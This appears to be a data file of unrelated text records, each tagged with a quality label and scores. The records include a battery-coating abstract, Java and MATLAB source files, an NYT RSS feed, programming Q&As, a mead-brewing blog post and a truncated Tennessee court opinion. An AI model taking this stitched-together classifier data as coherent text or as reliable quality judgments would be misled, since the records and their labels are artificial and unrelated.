text
stringlengths
8
5.74M
label
stringclasses
3 values
educational_prob
sequencelengths
3
3
Nondestructive Thickness Quantification for Nanoscale Coatings on Li-Ion Battery Cathode Material. Nickel manganese cobalt oxide (NMC) is a high energy capacity cathode material that attracts the interest of many research groups. Coating a protection layer on the NMC surface is one approach to improve its cycling and safety performance. However, there is no standard and consistent way to characterize the coating performance (thickness) of this protection layer, especially due to the nanoscale of primary particle and spherical morphology of the secondary particle. In this paper, a novel empirical method based on energy dispersive X-ray spectroscopy (EDX) analysis at low accelerating voltage is proposed to evaluate the protection layer thickness on the scale of tens of nanometers. The layer thickness is characterized by measuring the intensity decrease of a substrate element due to absorption by overlying coating layers. An internal standard coating (metal layer) is applied to mimic the morphology influence and improve the accuracy of thickness quantitation. For the model sample evaluation, carbon layer coatings of 1 to 10 nm thickness were successfully quantified by this method.
High
[ 0.658415841584158, 33.25, 17.25 ]
/* * Dice heroes is a turn based rpg-strategy game where characters are dice. * Copyright (C) 2016 Vladislav Protsenko * * This program is free software: you can redistribute it and/or modify * it under the terms of the GNU General Public License as published by * the Free Software Foundation, either version 3 of the License, or * (at your option) any later version. * * This program is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the * GNU General Public License for more details. * * You should have received a copy of the GNU General Public License * along with this program. If not, see <http://www.gnu.org/licenses/>. */ package com.vlaaad.dice.game.actions.results.imp; import com.vlaaad.dice.game.actions.results.IActionResult; import com.vlaaad.dice.game.actions.results.ITargetOwner; import com.vlaaad.dice.game.config.abilities.Ability; import com.vlaaad.dice.game.config.attributes.Attribute; import com.vlaaad.dice.game.objects.Creature; import com.vlaaad.dice.game.world.World; /** * Created 18.03.14 by vlaaad */ public class ExtraTurnResult implements ITargetOwner, IActionResult { public final Creature creature; public final Ability ability; public ExtraTurnResult(Creature creature, Ability ability) { this.creature = creature; this.ability = ability; } @Override public void apply(World world) { creature.set(Attribute.actionPoints, creature.get(Attribute.actionPoints) + 1); } @Override public Creature getTarget() { return creature; } }
Mid
[ 0.6050632911392401, 29.875, 19.5 ]
The Use of Serum MMP-9 and TIMP-1 in Acute Coronary Syndrome.
High
[ 0.660465116279069, 35.5, 18.25 ]
// Copyright (C) 2012 von Karman Institute for Fluid Dynamics, Belgium // // This software is distributed under the terms of the // GNU Lesser General Public License version 3 (LGPLv3). // See doc/lgpl.txt and doc/gpl.txt for the license text. #include "SourceVarSet.hh" #include "PhysicalModel.hh" ////////////////////////////////////////////////////////////////////////////// namespace COOLFluiD { namespace Framework { ////////////////////////////////////////////////////////////////////////////// SourceVarSet::SourceVarSet(const std::string& name) : Common::OwnedObject(), Config::ConfigObject(name), Common::NullableObject(), _varNames() { } ////////////////////////////////////////////////////////////////////////////// SourceVarSet::~SourceVarSet() { } ////////////////////////////////////////////////////////////////////////////// } // namespace Framework } // namespace COOLFluiD
Mid
[ 0.5375939849624061, 35.75, 30.75 ]
How positive and negative expectations shape the experience of visceral pain. Knowledge from placebo and nocebo research aimed at elucidating the role of treatment expectations and learning experiences in shaping the response to visceral pain fills an important research gap. First, chronic abdominal pain, such as in irritable bowel syndrome (IBS), is highly prevalent, with detrimental individual and socioeconomic impact and limited effective treatment options. At the same time, IBS patients show high placebo response rates in clinical trials and benefit from placebo interventions. Second, psychological factors including emotions and cognitions in the context of visceral pain have been implicated in the pathophysiology of IBS and other conditions characterized by medically unexplained somatic symptoms. Hence, the study of nocebo and placebo effects in visceral pain constitutes a model to assess the contribution of psychological factors. Herein, the clinical relevance of visceral pain is introduced with a focus on IBS as a bio-psycho-social disorder, followed by a review of existing clinical and experimental work on placebo and nocebo effects in IBS and in clinically relevant visceral pain models. Finally, emerging research trends are highlighted along with an outlook regarding goals for ongoing and future research.
High
[ 0.656565656565656, 32.5, 17 ]
60NYT > Tony Sancheztopics.nytimes.com/top/reference/timestopics/people/s/tony_sanchez/index.html?rss=1News about Tony Sanchez, including commentary and archival articles published in The New York Times.Copyright 2014 The New York Times Companyen-usTue 03 Mar 2015 18:20:15 -0500http://static01.nyt.com/images/section/NytSectionHeader.gifNYThttp://www.nytimes.comFund-Raising as a Barometer of a Statewide Campaign’s Successhttp://www.nytimes.com/2014/06/29/us/fund-raising-as-a-barometer-of-a-statewide-campaigns-success.html?partner=rssnyt&emc=rssThe end of June is the midyear mark for political fund-raising, and politicians’ reports are an acid test of their campaigns, a sign of who is competitive.By ROSS RAMSEYSun, 29 Jun 2014 00:00:00 -0400http://www.nytimes.com/2014/06/29/us/fund-raising-as-a-barometer-of-a-statewide-campaigns-success.html?partner=rssnyt&emc=rssLosers in Race Get Head Start for Next Stepshttp://www.nytimes.com/2013/12/15/us/losers-in-race-get-head-start-for-next-steps.html?partner=rssnyt&emc=rssCampaigning is underway for what for many will be unsuccessful runs for office that will nonetheless build the infrastructure needed for future victories.By ROSS RAMSEYSun, 15 Dec 2013 00:00:00 -0500http://www.nytimes.com/2013/12/15/us/losers-in-race-get-head-start-for-next-steps.html?partner=rssnyt&emc=rssIn Texas, Republican Who Inherited Top Job Is the Winner Outrighthttp://www.nytimes.com/2002/11/06/us/2002-elections-races-for-governor-texas-republican-who-inherited-top-job-winner.html?partner=rssnyt&emc=rssWith a healthy lead in early returns, Gov. Rick Perry declared victory last night for the office he inherited two years ago from George W. Bush, ending one of the nastiest and most expensive races in the country. ''By the sovereign power of the...By JIM YARDLEYWed, 06 Nov 2002 00:00:00 -0500http://www.nytimes.com/2002/11/06/us/2002-elections-races-for-governor-texas-republican-who-inherited-top-job-winner.html?partner=rssnyt&emc=rssIn Texas, a Democrat Cites Partisanship and Stays Awayhttp://www.nytimes.com/2002/10/30/us/the-2002-campaign-in-texas-a-democrat-cites-partisanship-and-stays-away.html?partner=rssnyt&emc=rssPhoto of Gov Rick Perry of Texas, Republican seeking re-election, speaking to Greater Heights Chamber Commerce in Houston; his Democratic challenger, Tony Sanchez, declines invitation to appear at event, citing its partisan toneWed, 30 Oct 2002 00:00:00 -0500http://www.nytimes.com/2002/10/30/us/the-2002-campaign-in-texas-a-democrat-cites-partisanship-and-stays-away.html?partner=rssnyt&emc=rssCampaign Season; Debut Outshines Preview of Texas Democrathttp://www.nytimes.com/2002/10/13/us/campaign-season-debut-outshines-preview-of-texas-democrat.html?partner=rssnyt&emc=rssThe first televised debate in the Texas governor's race was held on Wednesday night, and much was at stake for the Democratic candidate, Tony Sanchez. Mr. Sanchez is a businessman who has spent more than $53 million of his own money in his race...By Jim YardleySun, 13 Oct 2002 00:00:00 -0400http://www.nytimes.com/2002/10/13/us/campaign-season-debut-outshines-preview-of-texas-democrat.html?partner=rssnyt&emc=rssTexas Democrats Pin Hopes on a Big Spenderhttp://www.nytimes.com/2002/10/11/us/texas-democrats-pin-hopes-on-a-big-spender.html?partner=rssnyt&emc=rssNot so very long ago, Tony Sanchez was just a fabulously wealthy businessman, known in Texas business and political circles but unknown to the voting public. He fancied his thin mustache and wore aviator-styled glasses. He was supposedly a Democrat,...By JIM YARDLEYFri, 11 Oct 2002 00:00:00 -0400http://www.nytimes.com/2002/10/11/us/texas-democrats-pin-hopes-on-a-big-spender.html?partner=rssnyt&emc=rssTexas Home Insurance Crisis Roils Residents and Top Racehttp://www.nytimes.com/2002/10/04/us/texas-home-insurance-crisis-roils-residents-and-top-race.html?partner=rssnyt&emc=rssHundreds of thousands of homeowners in Texas are expected to lose their insurance coverage in the next year while others are seeing huge increases in premiums in a crisis that could harm the state's economy. It has already become a central issue in...By JIM YARDLEYFri, 04 Oct 2002 00:00:00 -0400http://www.nytimes.com/2002/10/04/us/texas-home-insurance-crisis-roils-residents-and-top-race.html?partner=rssnyt&emc=rssIn Texas Race, Leader Struggles for Footinghttp://www.nytimes.com/2002/08/14/us/in-texas-race-leader-struggles-for-footing.html?partner=rssnyt&emc=rssNearly 20 months ago, Rick Perry was handed the job of Texas governor from George W. Bush, along with a political landscape in which every statewide office was held by a Republican. Mr. Perry seemed to have inherited the equivalent of a royal flush. ...By JIM YARDLEYWed, 14 Aug 2002 00:00:00 -0400http://www.nytimes.com/2002/08/14/us/in-texas-race-leader-struggles-for-footing.html?partner=rssnyt&emc=rssIn Texas, Ad Heats Up Race For Governorhttp://www.nytimes.com/2002/07/30/us/in-texas-ad-heats-up-race-for-governor.html?partner=rssnyt&emc=rssGov. Rick Perry broadcast a new television advertisement today that says his Democratic opponent, Tony Sanchez, knew or should have known that his savings and loan company, now defunct, laundered drug money. Mr. Sanchez countered that neither he...Tue, 30 Jul 2002 00:00:00 -0400http://www.nytimes.com/2002/07/30/us/in-texas-ad-heats-up-race-for-governor.html?partner=rssnyt&emc=rssTexas Democrats Narrow the Field in Senate Racehttp://www.nytimes.com/2002/03/14/us/texas-democrats-narrow-the-field-in-senate-race.html?partner=rssnyt&emc=rssIn a tightly contested primary between Democrats hoping to fill the seat of Senator Phil Gramm, a teacher who is looking to become the state's first Hispanic senator will face a former Dallas mayor in a runoff. None of the three leading candidates...Thu, 14 Mar 2002 00:00:00 -0500http://www.nytimes.com/2002/03/14/us/texas-democrats-narrow-the-field-in-senate-race.html?partner=rssnyt&emc=rss
Low
[ 0.49484536082474206, 36, 36.75 ]
Q: Observing state changes in angular-ui-router As far as I understand, the usual way to get a notification on a state change is to put a callback on the $stateChangeStart event, like in this answer. However, if I understand correctly, I could also attach the $state object to the current scope, as in: myApp.controller('myAppCtrl', function($scope, $state) { $scope.$state = $state; } This, as far as I understand, would make it possible to watch state details directly from HTML templates, e.g. (assuming some of my states have a boolean flag .isAdminOnlyState set to true and I wanted to make the whole page red when displaying them): <body ng-class='{"everythingInRed": $state.current.data.isAdminOnlyState}'> What are advantages and disadvantages of this approach, as compared to having a listener function? A: It depends if you want to handle something globally or on a single controller/view, the approach you describe is suitable in the case of the latter. However in the code you posted, you need to ensure that myAppCtrl is always active in your app for that ng-class to be updated correctly. With routing you tend to have a controller(s) active at a given point in time, not all the time. One could argue that this is a disadvantage of the approach you posted, if you handle a $state changed event on the $rootScope you could put $state.current.data.isAdminOnlyState on the $rootScope and have it updated accordingly. A disadvantage of putting this on the root scope would be (I imagine) a performance impact, since for every state transition that handler is called, and the code inside the handler is executed, another disadvantage would be that by putting $state.current.data.isAdminOnlyState on the $rootScope pollutes the root scope which is usually frowned upon. Having said that, if you intend to have myAppCtrl active at all times, for example have it be the controller of a section of your main page, such as the navigation bar section for example, it would still be evaluated during every state transition. Somewhat irrelevant: ui router has a directive to do what you want to that in that code snippet, check out ui-sref-active.
High
[ 0.706199460916442, 32.75, 13.625 ]
[Kaplan's anastomosis in the little finger]. The connection between the dorsal branch of the ulnar nerve and the proper digital nerve of the little finger--described by Camper 1760 and by Kaplan 1963 more proximally--is shown in the little finger of four patients.
Mid
[ 0.621621621621621, 28.75, 17.5 ]
823 F.2d 547 Unpublish DispositionNOTICE: Fourth Circuit I.O.P. 36.6 states that citation of unpublished dispositions is disfavored except for establishing res judicata, estoppel, or the law of the case and requires service of copies of cited unpublished dispositions of the Fourth Circuit.Johnny Wayne LAFORCE, Petitioner-Appellant,v.R. M. MUNCY, Warden; Attorney General of Virginia,Respondent-Appellee. No. 87-6550 United States Court of Appeals, Fourth Circuit. Submitted April 21, 1987.Decided June 24, 1987. Johnny Wayne LaForce, appellant pro se. Frank Snead Ferguson, Office of the Attorney General, for appellees. Before SPROUSE, WILKINSON and WILKINS, Circuit Judges. PER CURIAM: 1 Johnny Wayne LaForce seeks to appeal the district court order dismissing his 28 U.S.C. Sec. 2254 petition. LaForce attacks the validity of his conviction, in March 1983, for grand larceny. His seventeen grounds for relief were previously presented to the Supreme Court of Virginia, in identical fashion, in a petition for a writ of habeas corpus. Nine allegations were dismissed pursuant to the mandate of Virginia Code Sec. 8.01-654(B)(2), and six pursuant to the rule of Slayton v. Parrigan, 215 Va. 27, 205 S.E.2d 680 (1974), cert. denied, 419 U.S. 1108 (1975). Application of these state procedural bars precludes federal consideration of these claims absent a showing of cause for the procedural default and prejudice resulting therefrom. Wainwright v. Sykes, 433 U.S. 72, 87 (1977). As the district court held, LaForce has not maintained his burden of demonstrating cause and prejudice. Therefore, that court properly declined to review the merits of these claims. 2 The remaining two allegations, raised by LaForce, were dismissed by the Supreme Court of Virginia under the rule of Hawks v. Cox, 211 Va. 91, 175 S.E.2d 271 (1970). These claims allege that: (1) the trial court erred in instructing the jury that a co-defendant is not required to testify and cannot be compelled to testify; and (2) that the prosecutor acted improperly when he argued to the jury that LaForce's exercise of his right to a separate trial prohibited production of certain evidence by the prosecution. We decline to address the merits of these claims and instead hold, as did the district court, that this petition constitutes an abuse of the writ.1 Rule 9(b), Rules Governing Section 2254 Cases. The record reveals that LaForce was, or should have been, aware of his claims at the time he filed a prior federal habeas petition. 3 For the foregoing reasons we deny leave to proceed in forma pauperis, deny a certificate of probable cause to appeal, and dismiss the appeal. We dispense with oral argument as it would not significantly aid the decisional process. 4 DISMISSED. 1 The record reveals that although the district court gave LaForce the opportunity to respond to the defendants' motion to dismiss he was not specifically notified that dismissal under Rule 9(b) was contemplated. See Johnson v. Copinger, 420 F.2d 395, 399 (4th Cir. 1969). The error, however, is harmless since LaForce did, in fact, address the possibility of Rule 9(b) dismissal
Low
[ 0.520446096654275, 35, 32.25 ]
Calvin Johnson: Next Games Not “Must Wins” Calvin Johnson doesn’t want to categorize the next three Lions games as “must win” contests. However, he doesn’t mind putting the upcoming stretch in the “love to win” division. During his weekly chat with Stoney, Bill and Sara, the Lions wide out stopped short of saying Detroit is desperate to win its upcoming contests with Green Bay, Houston and Indianapolis. But No. 81 admitted there is a burning desire to claim all three of the team’s looming matchups, especially considering all of them are at home. “I would love to have these three wins, especially where we are this time of the season,” Johnson said. “We definitely need to come out with a good quarter this quarter of the season. Definitely need to get some dubs.” At this point, a strong third quarter of the season is not just desirable, but necessary. With a 4-5 record, another loss would all but eliminate the Lions from playoff contention – or at the very least would force the team to win out the rest of the season. While the team is taking things on a weekly basis, Megatron couldn’t help but admit the team is thinking about what it has to do in order to extend its season. “We come into every week thinking about just that week and not down the road,” Johnson said. “But at the same time, it can creep into your mind that the playoffs are looming with every game.” It will be an uphill battle if the Lions want to accomplish their goals. The next three games are against some of the best opponents a team could find right now, as the Packers (6-3), Texans (8-1) and Colts (6-3) all rank in the top-10 of overall records. It does help, however, that Johnson is coming off the best two games he’s had all season – including a 12-catch, 207-yard performance against the Vikings on Sunday. It also helps that Megatron won’t have to face two of the Packers’ best defenders in defensive back Charles Woodson and linebacker Clay Matthews. Johnson admitted that losing those two players is a blow for Green Bay. “C Wood is playing the safety now,” Johnson said. “He’s the quarterback of that defense. He does a heck of a job out there. He’s a Hall of Fame-like player. Then Matthews, at the same time, he’s having a hell of a year.” Another player who is having quite the year – although blooming late – is none other than Johnson. But as an emerging superstar, he’s dealing with a target on his back – and worse. It appeared during Sunday’s loss that Minnesota players may have been doing a bit of head hunting, so to speak. Johnson downplayed the severity of the situation, but even he wasn’t so sure all of the blows he took were intended to be clean. “Originally, I didn’t think [they were headhunting],” Johnson said. “From seeing some of the hits, I took some shots to the head. The second one across the middle down there by the goal line [when] I caught the ball up the middle, that wasn’t necessary. [It was] launching with your head. I caught that big one over the middle – you really couldn’t see it, maybe – but I caught a little bit into the back of the head on that one, too. “I’m not going to call it dirty, but it could be seen as that.” CJ did an admirable job playing through the adversity on Sunday, but it should come as no surprise. It’s something he’s been asked to do all year. For Johnson, it’s quite simple: take what the defense gives you. “Really just taking advantage of the opportunities given,” Johnson said. “That’s kind of how you have to be; that’s kind of how you have to approach things. You never know how many opportunities you’re going to get when teams shift that safety over your head with that coverage. So I’m just trying to be opportunistic this year.”
Mid
[ 0.6387434554973821, 30.5, 17.25 ]
Wines and Meads, from "both sides of the pond" plus a few bits of other fermented food/drink Saturday, April 18, 2009 Extra "master plan" info..... Well the 2 batches of mead (one with Orange Blossom honey, the other with Spanish Lavender honey) have been on the go since the 5th, so that'd be about 13 days. I haven't checked how they're getting on gravity wise, but about 4 or 5 days ago, I topped them up. Now that in itself shouldn't have needed much thinking about, but I don't recall adding any tannin (I'd have to look back to the recipe........) so I decided to top them up with grape concentrate and RO (reverse osmosis) water. I took a 900g tin of "Youngs" white grape concentrate and split it equally between the two DJ's and then topped them both up to just below the neck with RO water. The bubbled a bit more too start with, so now I'm planning on just leaving them to finish. Then I can have a taste and decide on what's to be done from there. They're still bubbling at a rate of about 1 bubble ever 2 or 3 seconds, and while airlock activity isn't an accurate way of checking fermentation progress, it's fine for me, for the moment. Once they've slowed even more I'll check the gravity, just to make sure that they're still Ok.
Mid
[ 0.570841889117043, 34.75, 26.125 ]
Q: Shipping Address is not getting transferred I am facing an issue with the Paypal integration to my site which has been built using ExpressionEngine. I am using Paypal Express and Paypal Pro options. Some orders are working fine, while some orders are facing issues related to Seller Protection. It's showing the following information. Seller Protection : Not Eligible. We have no shipping address on file. Payment Type : Website Payment Pro API Solution Surcharge : Not Applicable card Type : Visa. Also, how will I be able to test and confirm the same? A: Seller Protection is offered as a courtesy to sellers for PayPal transactions. These are non-pro, transactions that PayPal Processed through the PayPal Network. There are a few guidelines in play to ensure that you receive Seller Protection. Below is a link to the full details for PayPal's Seller Protection Program PayPal Seller Protection Since all tangible items need to be shipped and proof of delivery (tracking number) needs to be provided to PayPal in order to receive seller protection, it is important for the shipping address to be provided to PayPal. All Express Checkout transactions for tangible goods should be passing this information to PayPal. All PayPal Payments Pro transactions are not eligible for Seller Protection. All digital goods or non-tangible items (services rendered) are not eligible for Seller Protection. The transactions that are stating they are not eligible for Seller Protection are most likely PayPal Payments Pro transactions.
Mid
[ 0.6272727272727271, 34.5, 20.5 ]
% compvar() - project selected components and compute the variance of % the original data they account for. % % Usage: % >> [proj, variance] = compvar( data, wts_or_act, winv, components); % % Required Inputs: % data - 2-D (channels, points) or 3-D (channels, frames, trials) % data array. % wts_or_act - {sphere weights} cell array containing the ICA sphere % and weights matrices. May also be a 2-D (channels, points) % or 3-D (channels, frames, trials) array of component % activations. % winv - inverse or pseudo-inverse of the product of the weights % and sphere matrices returned by the ICA decompnumsition, % i.e., inv(weights*sphere) or pinv(weights*sphere). % components - array of component indices to back-project % % Outputs: % proj - summed back-projections of the specified components % pvaf - percent variance of the data that the selected % components account for (range: 100% to -Inf%). % % Author: Arnaud Delorme, CNL / Salk Institute, 2001 % Copyright (C) 2001 Arnaud Delorme, Salk Institute, [email protected] % % This file is part of EEGLAB, see http://www.eeglab.org % for the documentation and details. % % Redistribution and use in source and binary forms, with or without % modification, are permitted provided that the following conditions are met: % % 1. Redistributions of source code must retain the above copyright notice, % this list of conditions and the following disclaimer. % % 2. Redistributions in binary form must reproduce the above copyright notice, % this list of conditions and the following disclaimer in the documentation % and/or other materials provided with the distribution. % % THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" % AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE % IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE % ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE % LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR % CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF % SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS % INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN % CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) % ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF % THE POSSIBILITY OF SUCH DAMAGE. function [ compproj, varegg ] = compvar( data, act, winv, compnums) if nargin < 4 help compvar; return; end; if iscell(act) && length(act) == 1 act = act{1}; end data = reshape(data, size(data,1), size(data,2)*size(data,3)); act = reshape(act , size(act ,1), size(act ,2)*size( act,3)); squaredata = sum(sum(data.^2)); % compute the grand sum-squared data if iscell(act) sphere = act{1}; weight = act{2}; act = (weight*sphere)*data; end compproj = winv(:,compnums)*act(compnums,:)-data; % difference between data and back-projection squarecomp = sum(sum(compproj.^2)); % the summed-square difference varegg = 100*(1- squarecomp/squaredata); % compute pvaf of components in data compproj = compproj+data; % restore back-projected data return;
Mid
[ 0.564516129032258, 30.625, 23.625 ]
Q: Selecting all rows whos foreign key points to a specific primary key? I have two tables. One is a 'Users' table. Each row (user) in the table has a unique id (primary key). The second table is a 'Tasks' table. Each row in the Tasks table has a foreign key which points to the user (in the Users table) that owns that task. Using SQL Express 2008, what query must I use to obtain a list of all tasks assigned to a user? For example, if I have a user in the Users table with a primary key of 0 and there are 10 rows in the Tasks table with a foreign key value of 0, that means that this user has 10 tasks assigned to him. I need to build a query that gives me these 10 rows from the Tasks table. A: If you have the user PK select tasks.* from tasks where tasks.UserId = 0 if you have the user name select tasks.* from tasks inner join users on users.UserId = tasks.UserId where users.UserName = 'Bob'
Mid
[ 0.6537530266343821, 33.75, 17.875 ]
IN THE COURT OF CRIMINAL APPEALS OF TENNESSEE AT NASHVILLE Assigned on Briefs September 10, 2009 LUIZ GOMEZ and FRANKLIN DELACRUZ v. STATE OF TENNESSEE Appeal from the Circuit Court for Warren County No. F-9586 Larry B. Stanley, Jr., Judge No. M2008-01868-CCA-R3-PC - Filed December 10, 2009 Petitioners, Luiz Gomez and Franklin Delacruz, each pled guilty to second degree murder and two counts of aggravated arson in Warren County in exchange for effective sentences of thirty-six years. Petitioners then each filed timely petitions for post-conviction relief. After a joint hearing on the petitions for relief, the post-conviction court denied relief, finding that Petitioners did not receive ineffective assistance of counsel and that their guilty pleas were entered knowingly, voluntarily, and intelligently. After a review of the record, we determine that Petitioners have failed to show that they received ineffective assistance of counsel or that their guilty pleas were entered involuntarily. Accordingly, the judgments of the post-conviction court are affirmed. Tenn. R. App. P. 3 Appeal as of Right; Judgments of the Circuit Court are Affirmed. JERRY L. SMITH , J., delivered the opinion of the court, in which NORMA MCGEE OGLE and J.C. MCLIN , JJ., joined. Bud Sharp, McMinnville, Tennessee, for appellant, Luiz Gomez. Robert Brooks, Memphis, Tennessee, for appellant, Franklin Delacruz. Robert E. Cooper, Jr., Attorney General and Reporter; Clark B. Thornton, Assistant Attorney General; and Rodney C. Strong, District Attorney General,, for the appellee, State of Tennessee. OPINION Factual Background In September of 2003, a special session of the Warren County Grand Jury returned an indictment against Franklin Delacruz, Luiz Gomez, and Ruben Pimentel for one count of first degree murder, one count of felony murder, four counts of aggravated arson and one count of conspiracy to commit first degree murder. The three men were indicted for their role in the death of Gina Thompson. Petitioners assisted Pimentel in setting Ms. Thompson on fire while she slept in her trailer. The men mistakenly believed Ms. Thompson had stolen cocaine from them. Prior to trial, the State made the decision to pursue the death penalty. On June 3, 2005, Petitioner Gomez and Petitioner Delacruz1 entered into a negotiated plea agreement with the State. The agreement specified that each Petitioner would plead guilty to second degree murder and two counts of aggravated arson. The remaining counts of the indictment were dismissed. In exchange for the guilty pleas, Petitioners received a thirty-six year sentence to be served at 100% for the second degree murder conviction. Petitioners received an eighteen-year sentence to be served at 100% for each aggravated arson conviction. The sentences for aggravated arson were ordered to run consecutively to each other but concurrently to the sentence for second degree murder, for a total effective sentence of thirty-six years at 100% in the Department of Correction. After the entry of the guilty pleas, Petitioners filed separate pro se petitions for post- conviction relief. In their petitions, they argued that they received ineffective assistance of counsel and that their guilty pleas were unknowingly and involuntarily entered. The post-conviction court appointed counsel and held a hearing on the petitions for post- conviction relief. Petitioner Gomez At the hearing, Petitioner Gomez informed the trial court that he did not understand the charges because he spoke Spanish rather than English and that he was pressured to plead guilty by his two attorneys. The trial court provided an interpreter for Petitioner Gomez during all phases of the court proceedings. Petitioner Gomez claimed that his trial counsel told him to plead guilty because a jury would convict him based on the evidence and the only way he could avoid the death penalty would be to negotiate a plea agreement. Petitioner Gomez admitted that he was able to recall “some” of the evidence that trial counsel told him would be introduced at trial. Petitioner Gomez complained that the attorneys did not go over “all” the evidence and did not point out any evidence that would be favorable to the defense at trial. Later, Petitioner Gomez admitted that counsel had discussed the facts of the case with him on a number of occasions, even showing him a translated version of his videotaped statement. Next, Petitioner Gomez claimed that he did not understand the plea agreement or hearing. He admitted that one of his trial counsel had gone over the plea agreement with him but complained that the agreement was in English and no interpreter was present at the time. Later on during the hearing, Petitioner Gomez agreed that both trial counsel met with him at the jail and went over the plea agreement while a Spanish interpreter was present. According to him, the interpreter left before he signed the agreement. Petitioner Gomez admitted that even though the agreement was in English, 1 The disposition of the indictment against Ruben Pimentel is unclear from the record on appeal. -2- he understood the contents of the deal prior to signing it. He claimed that the interpreter did not tell him what was contained in the document. Petitioner Gomez also admitted that he had been in court in New York and had previously entered a guilty plea in a burglary case. Petitioner Gomez recalled the details of the plea hearing, including the plea colloquy in which the trial court asked questions about his rights. Petitioner Gomez claimed that he was not telling the truth when the trial court asked if he wanted to enter the plea. He did not answer negatively to any of the trial court’s questions because, according to Petitioner Gomez, his trial counsel told him to answer “yes” to all of the judge’s questions. Petitioner Gomez acknowledged that he expressed his understanding of the agreement during the plea hearing, including the part in which he understood that his sentence would be the same as Petitioner Delacruz. Further, Petitioner was in court when Petitioner Delacruz signed his petition, so he had already heard the agreement translated into Spanish before the entry of his plea. Lead trial counsel for Petitioner Gomez testified that he discussed trial strategy with Petitioner, including the lack of “good facts” and the multitude of “bad facts that we were going to have to either ignore or to explain away, which [was] going to be difficult to do” at trial. Trial counsel explained to the trial court that there were facts that could be used in mitigation during the sentencing phase of trial but would be detrimental during the guilt phase of trial. Lead trial counsel admitted that an interpreter was not always present during their meetings with Petitioner Gomez. Trial counsel did not feel that communication was an issue with regard to simple information about the case. Trial counsel also admitted that an interpreter was not present when Petitioner signed the agreement but that an interpreter went over the agreement with Petitioner Gomez. According to trial counsel, Petitioner Gomez never seemed to have reservations about taking the plea agreement. The decision was left up to Petitioner and he chose to accept the plea. Petitioner Delacruz Petitioner Delacruz also testified at the post-conviction hearing. He recalled meeting with his two attorneys as well as the investigators and interpreters on the day prior to the plea. In his words, they “explained all the evidence that [the State] had against me and that’s when they told me that I did not have good probabilities or that I was not likely to be successful.” Petitioner Delacruz had turned down a prior plea offer because he claimed that he was not guilty. At this meeting, Petitioner felt that he had “no option” even though he did not want to take the plea agreement. Petitioner Delacruz was convinced that he would be found guilty if he went to trial. The investigators told him “[t]hat if we went to trial that I would be found guilty and if I didn’t get the death penalty they would give me a lot more time than what was being offered.” -3- Petitioner Delacruz claimed that on the day prior to the plea agreement the interpreter left prior to his attorney’s arrival.2 He insisted that he did not discuss the plea agreement with the interpreter. When the attorneys arrived, they did not discuss the plea agreement, and Petitioner Delacruz signed it even though he did not understand them or the agreement. In fact, Petitioner Delacruz informed the post-conviction court that his attorneys visited him “many times” without an interpreter and that he could not understand them because he did not speak English. Petitioner Delacruz felt that he had “no chance of success” so he entered the plea even though he did not understand any English. Petitioner Delacruz recalled the day of the plea hearing. He testified at the hearing that he had never been informed that he had a right to go to trial. However, upon further questioning, Petitioner Delacruz informed the post-conviction court that he had been told by his attorneys that he could have a trial but that the jury would not “believe” him and would find against him even though he was “not guilty of the crime.” Petitioner Delacruz claimed that one of his trial counsel told him that he would not be permitted to testify at trial. Like Petitioner Gomez, Petitioner Delacruz admitted at the post-conviction hearing that he had been to court in New York and had pled guilty “two or three times” in the past. As for the plea hearing at issue herein, Petitioner Delacruz admitted that he expressed his understanding of the plea to the trial court but claimed that he “didn’t have any choice but to say yes” and had “no choice but to sign [it].” In fact, he stated that he “felt like [he] was stuck between a rock and a hard place.” Assistant trial counsel testified that he represented Petitioner Delacruz at the plea hearing and had previously handled between fifteen and twenty first degree murder cases. The defense team consisted of two attorneys. Assistant trial counsel recalled meeting with Petitioner Delacruz on a frequent basis and determined when there was going to be “substantive conversation,” it was “clear” that they would need an interpreter. Assistant trial counsel recalled that the plea offer of thirty-six years was relayed to Petitioner Delacruz in the late part of May or the first few days of June of 2005. At this meeting, Petitioner Delacruz informed trial counsel that he was not interested in the offer. Assistant trial counsel denied that he told Petitioner Delacruz that he would be prevented from testifying at trial. In fact, he recalled telling Petitioner that “it was important that he did testify” and thought that the defense team would probably “encourage him to testify” if the case went to trial. After the first meeting at which the plea offer was conveyed, Petitioner Delacruz met with the investigators. Soon after this meeting, trial counsel met with him again. At this meeting, “it was communicated to [trial counsel] by Mr. Delacruz that indeed he did want to take the deal. He wasn’t excited about it but he did want to go ahead and do it.” Assistant trial counsel insisted that he did 2 Petitioner Delacruz testified that only one of his attorneys attended this meeting. -4- not tell Petitioner Delacruz that his only option was to take the deal. In fact, assistant trial counsel testified that he “always make[s] it very clear they have the right to go to trial and that’s not my decision, it’s theirs.” Assistant trial counsel informed the post-conviction court that he explained the legal issues to Petitioner Delacruz who “had a difficult time understanding felony murder and understanding criminal responsibility . . . which is not uncommon . . . .” When all was said and done, assistant trial counsel felt like Petitioner Delacruz understood the concepts and assistant trial counsel was “firmly convinced” that Petitioner Delacruz had an understanding of the legal situation. At the conclusion of the hearing, the post-conviction court denied relief from the bench. The post-conviction court later entered an order in each case denying the petitions for relief. In the orders, the post-conviction court specifically determined that each Petitioner received effective assistance of counsel. Next, the post-conviction court determined that, based on the evidence presented, each Petitioner understood what they were doing when they entered their plea agreements. Finally, the post-conviction court found that there was “no undue influence” by the attorneys to try to “coerce” Petitioners to enter into a plea agreement. Petitioners Gomez and Delacruz filed timely notices of appeal, challenging the post- conviction court’s denial of post-conviction relief. Analysis Post-Conviction Standard of Review The post-conviction court’s findings of fact are conclusive on appeal unless the evidence preponderates otherwise. See State v. Burns, 6 